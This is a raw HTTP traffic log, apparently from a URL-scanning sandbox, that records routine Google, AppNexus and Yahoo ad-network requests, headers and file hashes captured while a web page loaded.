Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.33
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 07 Feb 2018 13:59:35 GMT
Expires: Wed, 21 Feb 2018 13:59:35 GMT
Etag: 18254379283724408787
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 3642
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 468572
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   3642
Md5:    24d24f1211524aff604a7a982bfb33ed
Sha1:   15c0f03407eb77a3da6a7476c6ffb4b8993eaefb
Sha256: 78ef839be435484d29b2cd6e0fe1a05331bf1df22f4105141e45f7ab4703f9d7
                                        
                                            GET /pagead/js/r20180207/r20110914/client/ext/m_window_focus_non_hydra.js HTTP/1.1 
Host: tpc.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.33
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 07 Feb 2018 13:59:35 GMT
Expires: Wed, 21 Feb 2018 13:59:35 GMT
Etag: 2112876643077467119
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 1203
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 468573
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   1203
Md5:    9a504624fadda2dcec8340bf93b2252c
Sha1:   fa6dbebcf9b5450a1dd2f2371c971e838ff627c0
Sha256: 1451d6f091d36a586c2d20cc652337663e11fe4045ec6867de1e21d5d8868c93
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:09:08 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    02c2d7680ddcccd87bcd516cf9b669c7
Sha1:   3732fa75abb6b634a454c15b668e5a199bccc444
Sha256: 80e2d7faa506aa5d0f77700ad5d19f1f8438761c6226dd1baed35da9b462833b
                                        
                                            GET /bg/IOA8y9bJh23yzX_Xx1Lzdpvil-FmhhSrkRF2am8kUAc.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://tpc.googlesyndication.com/sodar/6uQTKQJz.html

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4991
Date: Mon, 12 Feb 2018 14:04:59 GMT
Expires: Tue, 12 Feb 2019 14:04:59 GMT
Last-Modified: Mon, 05 Feb 2018 09:45:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 36249
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   4991
Md5:    35c97f406c207e558268924a05d5cfb0
Sha1:   410bd15d5b2dbffb516605c9d5a2a52d8d8d6eed
Sha256: 536f40cf7ac29a53a42ac183eefd062e0228e22f034f8ad2e8f1ffaaa771f5ed
                                        
                                            GET /setuid?entity=101&code=CAESEHIGjOk6oLPAsvxuQNTD784&google_cver=1 HTTP/1.1 
Host: ib.adnxs.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/xbbe/pixel?d=COD5IRDn0jYY0IC5CDAB&v=APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA-x3cafgloPSVroOCiqfOxveidCWavRsq4O

                                         
                                         185.33.223.198
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.13.4
Date: Tue, 13 Feb 2018 00:09:10 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
X-XSS-Protection: 0
AN-X-Request-Uuid: 98d3f389-6192-4406-a441-5328e7f1a8a0
X-Proxy-Origin: 77.40.129.123; 77.40.129.123; 310.bm-nginx-loadbalancer.mgmt.ams1; *.adnxs.com; 185.33.223.144:80


--- Additional Info ---
                                        
                                            GET /activeview?avi=BJ3droiyCWvbnMpSfYs_ipNAOAKPV7eT_BgAAEAE4AcgBCcgDAuAEA6AGTNIIBQiAYRABwhMGGKDbzL8D&cid=CAASBORoBGo&id=osdim&ti=1&r=pv&uc=0&tgt=nf&cl=0&v=r20180207 HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /cms/v1?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1 HTTP/1.1 
Host: ads.yahoo.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/xbbe/pixel?d=COD5IRDn0jYY0IC5CDAB&v=APEucNWlf2nVGD7QVqn66Y9lRVBTes5IRW2ASGQmTA-x3cafgloPSVroOCiqfOxveidCWavRsq4O

                                         
                                         217.12.15.54
HTTP/1.1 302 Found
Content-Type: text/plain; charset=utf-8
                                        
Date: Tue, 13 Feb 2018 00:09:07 GMT
P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: B=dhrupodd84b53&b=3&s=9l; expires=Wed, 13-Feb-2019 00:09:07 GMT; path=/; domain=.yahoo.com
Location: https://googleads.g.doubleclick.net/xbbe/match?xid=lsEcJlxiQQxNWceJ11Bt..mO
Cache-Control: private
Content-Length: 0
Age: 0
Connection: keep-alive
Strict-Transport-Security: max-age=31536000
Server: ATS
Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
Public-Key-Pins-Report-Only: max-age=2592000; pin-sha256="2fRAUXyxl4A1/XHrKNBmc8bTkzA7y4FB/GLJuNAzCqY="; pin-sha256="2oALgLKofTmeZvoZ1y/fSZg7R9jPMix8eVA6DH4o/q8="; pin-sha256="47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU="; pin-sha256="cAajgxHlj7GTSEIzIYIQxmEloOSoJq7VOaxWHfv72QM="; pin-sha256="Gtk3r1evlBrs0hG3fm3VoM19daHexDWP//OCmeeMr5M="; pin-sha256="i7WTqTvh0OioIruIfFR4kMPnBqrS2rdiVPl/s2uC/CY="; pin-sha256="iduNzFNKpwYZ3se/XV+hXcbUonlLw09QPa6AYUwpu4M="; pin-sha256="I/Lt/z7ekCWanjD0Cvj5EqXls2lOaThEA0H2Bg4BT/o="; pin-sha256="JbQbUG5JMJUoI6brnx0x3vZF6jilxsapbXGVfjhN8Fg="; pin-sha256="lnsM2T/O9/J84sJFdnrpsFp3awZJ+ZZbYpCWhGloaHI="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="SVqWumuteCQHvVIaALrOZXuzVVVeS7f4FGxxu6V+es4="; pin-sha256="uUwZgwDOxcBXrQcntwu+kYFpkiVkOaezL0WYEZ3anJc="; pin-sha256="UZJDjsNp1+4M5x9cbbdflB779y5YRBcV6Z6rBMLIrO4="; pin-sha256="Wd8xe/qfTwq3ylFNd3IpaqLHZbh2ZNCLluVzmeNkcpw="; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; includeSubdomains; report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only"


--- Additional Info ---
                                        
                                            GET /viewad/5239968/fittaste728x90a.gif HTTP/1.1 
Host: s0.2mdn.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385

                                         
                                         172.217.20.38
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Length: 32306
Date: Mon, 12 Feb 2018 16:34:07 GMT
Expires: Tue, 13 Feb 2018 16:34:07 GMT
Last-Modified: Mon, 04 Jan 2016 12:47:26 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 27301
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 728 x 90
Size:   32306
Md5:    89f9e9ed83ec2686e1c4e321f00b8b10
Sha1:   9dff7bb605e8c8bcc7b760a628dad54911fc56e7
Sha256: 1ccf20d3e26b8130eba96baab00f6cdde763eafed8ba85644b29f8106e54f3d2
                                        
                                            GET /pagead/gen_204?id=sodar&v=24&t=2&bgai=BgFteoyyCWtm1AZG3Yu_ujMANAAAAADgB4AQC&bg=!ERKlEgpEEON9jcOanjcCAAAA7FIAAAAXCgAGrOjpgkHnmQEjxKJ120mkL8WmczmTe7ImBdVTNgJq-zzyJtZyXHA-Ibj0_pDDBX-w9DaWVNEKeW6ihm5vHq1Km_j6-nRs4lsUZSwl183XqAKrSXn7AkUTSCtW1j3-ladVTBhHavHfmC7Hmzn_I3HiZn7D0NlNVjyCEo7qW9fg54ssYUJ97EeLIcszX7vwngDo5BqJJx1wUlGbJuyvWo8PVGlqVFv13gKbsQ-F7mXY5JyTVp60bQW_Fb_EfgqaaRmQJI5LVkf6RwCRhKqhLw574AVi6DpTddXgToBJRCCrCkskmlDLzHNh2QFNp_pKInenzzim4_06fgS5FRiQgSgAQdxHrVlzIVazJZ4gbBujoZXp5RqzDRGZ0BIDyJpzZarcQm7PCytPJjr1-dbl HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://tpc.googlesyndication.com/sodar/6uQTKQJz.html

                                         
                                         172.217.21.130
HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
                                        
                                            GET /pcs/view?xai=AKAOjst6N3oaOluAP4IB4M9fyDM1QAT-lL4h6wcmq-gf7QLiSegZLPNZZ381ieARdtKh8Zizi4R3xhQdaMfyOMJsjGYuqfA21_JtM3OLCHpNmdxnMFEjXqSBWVUglkiJ6FZcviB0TusIBhLGYcHLetQUNHuaFTySLhXYRxt2D3t1Hb1UYbfDFC4z2Zxsr9NxcPEWc5x06FQgWN0Wj3qXGP93UeHvCbDONIWpEppv9dC8v3EHGW96Cn4eQcaSLTbIo8PX1gJLgruxWX0GX4NZm7_SyA1HPfiFBEifRu2U5ShNpbB9fg4o5ibUJPa5CpjLfe9fb134mTBKA40AuRC1914rnui8ssQWwaktU8R9oWfaa6zMnL1GrjEzRihf-PFe5yYMH8AKwpEngPlJJiiQcGTMY8BrWNqkodJLST0eLO-dw8pIEj81bOIxsTEIJwTxY5HIzCZj2mUQlbViapxLWgOObTBm6zJZlLRMYOOXggwGTXSEdPkpAWF52QLOw_wrEQZFSXT5IPDSzG_gAAen6ljH2R6KUXQe2uTHHupZ9pwgIwzz9fpwYgdpXkhX-N_rYcCI9brj3O5WfVSF_6cNyQ2mORYdhx-2L1jRf7NofgI_LvWXLTCM-LZ3SsehvJfg9b_UX5N1B_mOMV5SjV-HEHJKq2_DwPEZc2m-uL2DRMZV3psgl9wVC3-861HKVzbAN0RjOGCnqsMvgfibL4JUskJraRc3u6jF_-KQxvE6l98hSsDStkm2G687GpRdLeD-xF-SkSL6EXzNSRsfZw0PKgo5-i_pNYfXuzJZl3lS9wyiiV0zpyyjaJMZ5b8OtJff2jX6&sai=AMfl-YR6o2Lh7g4Y1jpgDIpVsG2LiiHpvOyiT1iOQxPYx_DDxc_QAzymqBGE0R4T3IDHi4olmiaXUFcnBG5P8jfuvwaMl5yOq4C6&sig=Cg0ArKJSzOS3FuoTXlDbEAE&urlfix=1&adurl= HTTP/1.1 
Host: googleads4.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&vis=0&rsz=%7C%7C%7C&abl=CS&ppjl=u&pfx=0&fu=144&bc=1&ifi=3&dtd=385
Cookie: IDE=AHWqTUn3lF26de1_opJkTXr8zjib-QFQ1axrFncjdAYl-qW3PRFGHfrioGgj-omi

                                         
                                         172.217.20.34
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Timing-Allow-Origin: *
Cache-Control: private
X-Content-Type-Options: nosniff
Date: Tue, 13 Feb 2018 00:09:08 GMT
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
                                        
                                            GET /pcs/activeview?xai=AKAOjsvso-Y2c9MOi52lj7E8Sjtz2pPhsoZS6EzlMj1aaeiGX800l0BD6x5GlSNiJDX0f6wMF1tQf-fT6VRGsGpEZ90&sig=Cg0ArKJSzMq_5rSsNcQcEAE&id=lidar2&adk=1&mtos=1099,1099,1099,1099,1099&tos=1099,0,0,0,0&p=534,220,624,948&opac=1&inapp=0&mcvt=1099&rs=5&tfs=50&tls=1149&mc=1&lte=1&bas=-1&bac=-1&if=1&r=v&tt=1110&bs=1184,715&bos=1184,863&ps=-12245933,-12245933&ss=1176,885&pt=40&xde=1&deb=1-1-1-7-3-7&tvt=1101&is=728,90&iframe_loc=https%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2222385521793316%26output%3Dhtml%26h%3D90%26slotname%3D2187861180%26adk%3D1512129485%26adf%3D807048394%26w%3D900%26fwrn%3D4%26lmt%3D1518480535%26loeid%3D38893312%26rafmt%3D1%26format%3D900x90%26url%3Dhttp%253A%252F%252Flyonhealycpo.com.ourssite.com%252F%26ea%3D0%26flash%3D10.0.45%26fwr%3D0%26resp_fmts%3D3%26wgl%3D0%26adsid%3DNT%26dt%3D1518480546201%26bpp%3D19%26fdt%3D42%26idt%3D343%26shv%3Dr20180207%26cbv%3Dr20170110%26saldr%3Daa%26prev_fmts%3D900x90%252C300x250%26correlator%3D948329139743%26frm%3D20%26ga_vid%3D889824150.1518480546%26ga_sid%3D1518480546%26ga_hid%3D521531601%26ga_f&url=https%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2222385521793316%26output%3Dhtml%26h%3D90%26slotname%3D2187861180%26adk%3D1512129485%26adf%3D807048394%26w%3D900%26fwrn%3D4%26lmt%3D1518480535%26loeid%3D38893312%26rafmt%3D1%26format%3D900x90%26url%3Dhttp%253A%252F%252Flyonhealycpo.com.ourssite.com%252F%26ea%3D0%26flash%3D10.0.45%26fwr%3D0%26resp_fmts%3D3%26wgl%3D0%26adsid%3DNT%26dt%3D1518480546201%26bpp%3D19%26fdt%3D42%26idt%3D343%26shv%3Dr20180207%26cbv%3Dr20170110%26saldr%3Daa%26prev_fmts%3D900x90%252C300x250%26correlator%3D948329139743%26frm%3D20%26ga_vid%3D889824150.1518480546%26ga_sid%3D1518480546%26ga_hid%3D521531601%26ga_f&referrer=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&itpl=0&avms=xde&v=r20180207 HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&output=html&h=90&slotname=2187861180&adk=1512129485&adf=807048394&w=900&fwrn=4&lmt=1518480535&loeid=38893312&rafmt=1&format=900x90&url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&ea=0&flash=10.0.45&fwr=0&resp_fmts=3&wgl=0&adsid=NT&dt=1518480546201&bpp=19&fdt=42&idt=343&shv=r20180207&cbv=r20170110&saldr=aa&prev_fmts=900x90%2C300x250&correlator=948329139743&frm=20&ga_vid=889824150.1518480546&ga_sid=1518480546&ga_hid=521531601&ga_fc=0&pv=1&icsg=0&nhd=1&dssz=0&mdo=0&mso=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=10&u_nmime=92&adx=130&ady=599&biw=1159&bih=754&abxe=1&scr_x=0&scr_y=0&eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&oid=3&rx=0&eae=4&fc=784&brdim=%2C%2C-4%2C-4%2C1176%2C0%2C